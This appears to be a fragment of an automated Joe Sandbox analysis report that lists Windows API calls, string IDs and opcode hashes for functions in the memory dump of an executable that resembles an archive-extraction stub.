                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 1d98e65b5426c5585bbfeb509851c88ec7ffe5f103a9424c203f9c8a1daa0d93
                                                                                      • Instruction ID: 6a91d7ecb355f7b7fc33b1651af45e2f6c9c5ccb40a8090b233dd0c5d531abec
                                                                                      • Opcode Fuzzy Hash: 1d98e65b5426c5585bbfeb509851c88ec7ffe5f103a9424c203f9c8a1daa0d93
                                                                                      • Instruction Fuzzy Hash: 02B01292379001EC3188F2586D02D37014CD0C2F14330561FF801C0240EA504C049336
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C799
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNELBASE(?,00D78EDB,?,?,-00001954), ref: 00D79B6D
                                                                                      Similarity
                                                                                      • API ID: File
                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00D8927A,00DB2120,00000000,00DB3122,00000006), ref: 00D89027
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(000000FF,?,?,00D79473), ref: 00D794BE
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: be366deac609a11814f1300415d6540fe0c53cccdf224cb52082b8d8eb696188
                                                                                      • Instruction ID: 74b9232834c1550203e81b084f0dbf018248227b9cff28f1b7badb15620d5ae9
                                                                                      • Opcode Fuzzy Hash: be366deac609a11814f1300415d6540fe0c53cccdf224cb52082b8d8eb696188
                                                                                      • Instruction Fuzzy Hash: 1CF0E231192B144FDF308A24D518792F7E89B1273AF08CB1ED0EE439D0E371A84A8B35
                                                                                      APIs
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D8A5C8
                                                                                      • EndDialog.USER32(?,00000006), ref: 00D8A5DB
                                                                                      • GetDlgItem.USER32(?,0000006C), ref: 00D8A5F7
                                                                                      • SetFocus.USER32(00000000), ref: 00D8A5FE
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D8A63E
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D8A671
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D8A687
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D8A6A5
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8A6B5
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D8A6D2
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D8A6F0
                                                                                        • Part of subcall function 00D7D142: LoadStringW.USER32(?,?,00000200,?), ref: 00D7D187
                                                                                        • Part of subcall function 00D7D142: LoadStringW.USER32(?,?,00000200,?), ref: 00D7D19D
                                                                                      • _swprintf.LIBCMT ref: 00D8A720
                                                                                        • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
                                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D8A733
                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8A736
                                                                                      • _swprintf.LIBCMT ref: 00D8A791
                                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D8A7A4
                                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D8A7BA
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D8A7DA
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8A7EA
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D8A804
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D8A81C
                                                                                      • _swprintf.LIBCMT ref: 00D8A84D
                                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D8A860
                                                                                      • _swprintf.LIBCMT ref: 00D8A8B0
                                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D8A8C3
                                                                                        • Part of subcall function 00D8932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D89355
                                                                                        • Part of subcall function 00D8932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00DAA154,?,?), ref: 00D893A4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                      • API String ID: 3227067027-1840816070
                                                                                      • Opcode ID: 1306b3ef0b92680953a0ee945a44700d0b467774553dbf58c8a6625a19834e8c
                                                                                      • Instruction ID: f26d9ffa7e91f1b21c2b6e7bb74bff08fd5d4e8a07391ed07eea4eb9e062cf95
                                                                                      • Opcode Fuzzy Hash: 1306b3ef0b92680953a0ee945a44700d0b467774553dbf58c8a6625a19834e8c
                                                                                      • Instruction Fuzzy Hash: 98917672548349BFE621EBA4CC49FFB77ACEB4A700F04491AF649D6180E77196058773
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D77075
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D771D5
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D771E5
                                                                                        • Part of subcall function 00D77A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D77AAC
                                                                                        • Part of subcall function 00D77A9D: GetLastError.KERNEL32 ref: 00D77AF2
                                                                                        • Part of subcall function 00D77A9D: CloseHandle.KERNEL32(?), ref: 00D77B01
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D771F0
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D772FE
                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00D7732A
                                                                                      • CloseHandle.KERNEL32(?), ref: 00D7733C
                                                                                      • GetLastError.KERNEL32(00000015,00000000,?), ref: 00D7734C
                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00D77398
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00D773C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                      • API String ID: 3935142422-3508440684
                                                                                      • Opcode ID: c58290825d41a2d12b32aab1bb83574f0df36c8b9a898fb740d0bb445d957a80
                                                                                      • Instruction ID: a8293d46c46e29233e2c19879888f719d93b70e873c21d3bbdada707c2f85a15
                                                                                      • Opcode Fuzzy Hash: c58290825d41a2d12b32aab1bb83574f0df36c8b9a898fb740d0bb445d957a80
                                                                                      • Instruction Fuzzy Hash: 12B1AE71904218ABDF21DF64CC45BEE77B8EF09304F14896AF959E7282E730AA45CB71
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memcmp
                                                                                      • String ID: CMT$h%u$hc%u
                                                                                      • API String ID: 3004599000-3282847064
                                                                                      • Opcode ID: f2ce574f67a567fd57cf4a943a4bbbf725d0a36bcc06801b2a460534dc10493f
                                                                                      • Instruction ID: ea0657b9a9e77989c00005697d7df3458c56381b7b1aefd179601281ae5e2dc5
                                                                                      • Opcode Fuzzy Hash: f2ce574f67a567fd57cf4a943a4bbbf725d0a36bcc06801b2a460534dc10493f
                                                                                      • Instruction Fuzzy Hash: CC3290715142849FDF18DF64C896AEA37A5EF15300F48857DFD8E8B282EB709A48CB70
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$d0F
                                                                                      • API String ID: 4168288129-863156498
                                                                                      • Opcode ID: 1a56f2135c2deadde1b3e1e4d6316898a505b61e6f7b5f44d1acff41920a6aee
                                                                                      • Instruction ID: 210737aa754985d78f0c221b715ed67191272c51ca5c6985200e02665be2a7e1
                                                                                      • Opcode Fuzzy Hash: 1a56f2135c2deadde1b3e1e4d6316898a505b61e6f7b5f44d1acff41920a6aee
                                                                                      • Instruction Fuzzy Hash: 4FC24C72E046288FDF25CE28DD407E9B7B5EB84315F1941EAD84DE7240E774AE818FA1
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D72775
                                                                                      • _strlen.LIBCMT ref: 00D72CFF
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D72E56
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3741668355-2756464174
                                                                                      • Opcode ID: d36241517d43e7f9b6b3a455c77f06b7fab1e0bd8129a33ba2295b39f784daf4
                                                                                      • Instruction ID: a6e312f89fd6c7817c803f0e8dd79009028e9291c81e0721a4c00bcdbf138b6c
                                                                                      • Opcode Fuzzy Hash: d36241517d43e7f9b6b3a455c77f06b7fab1e0bd8129a33ba2295b39f784daf4
                                                                                      • Instruction Fuzzy Hash: E362C2715002848FDB29DF68C8956FA3BE1EF54304F08857EEC9E8B286E7719949CB70
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D95C4B
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D95C55
                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00D95C62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID: d0F
                                                                                      • API String ID: 3906539128-1238022483
                                                                                      • Opcode ID: 93333217a0b25ea831337e258db3cf9056f8f25f801de68cf62274c6d34946b1
                                                                                      • Instruction ID: 26ee80903113e6125fb04b9fa1c8083f3a368792a9bd3e725cb398465e010def
                                                                                      • Opcode Fuzzy Hash: 93333217a0b25ea831337e258db3cf9056f8f25f801de68cf62274c6d34946b1
                                                                                      • Instruction Fuzzy Hash: 1C31B4749013299BCB21DF64D989B9DBBB4FF18310F5041EAE40CA7290E7709B818F54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                      • Instruction ID: 72520cb57c54ed58ec6db8056d900caf4b371f9c207561cee3a2d4e4ff1d275a
                                                                                      • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                      • Instruction Fuzzy Hash: 64021D72E012199FDF14CFADC8806ADF7F1FF48314F19826AD919E7284D731A9418BA5
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D89355
                                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00DAA154,?,?), ref: 00D893A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D9E8CF,?,?,00000008,?,?,00D9E56F,00000000), ref: 00D9EB01
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 00D7A905
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,00D8D604), ref: 00D8DBC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: ef41a06f89e76bdf41a3d02a468dac2de1552387610cf08ebd698cf7839a6081
                                                                                      • Instruction ID: c68436ab7ea5bfaa8ba56d91a91bc517553ae778f566099c3c141031db7b5811
                                                                                      • Opcode Fuzzy Hash: ef41a06f89e76bdf41a3d02a468dac2de1552387610cf08ebd698cf7839a6081
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: d0F
                                                                                      • API String ID: 0-1238022483
                                                                                      • Opcode ID: b6fe2655792fe0e934950ad02dc349f322119710c59c2e49dbc3c6621db3fd5b
                                                                                      • Instruction ID: 420e657db90fec59a7f5da9f8ba3a0fcfb3eaac40b27e95310bc1ee256fc3d04
                                                                                      • Opcode Fuzzy Hash: b6fe2655792fe0e934950ad02dc349f322119710c59c2e49dbc3c6621db3fd5b
                                                                                      • Instruction Fuzzy Hash: 17618CB160070876DF389E288896BFE63D8EF12744F1C0A19E882DB691D661DD8283B5
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 8eb33a775f6a13876541a7452564088a3dc3a5655ffa1740c5464bfd17bdaad6
                                                                                      • Instruction ID: f4acb9842a2e45f19196315e601f63caa8bd0350871951a90c1ee0bc154bf07e
                                                                                      • Opcode Fuzzy Hash: 8eb33a775f6a13876541a7452564088a3dc3a5655ffa1740c5464bfd17bdaad6
                                                                                      • Instruction Fuzzy Hash: D0A00171A023429BA7508F36AA0A6493AA9AA467A1B15906AA409C6360EB3485569A21
                                                                                      Memory Dump Source
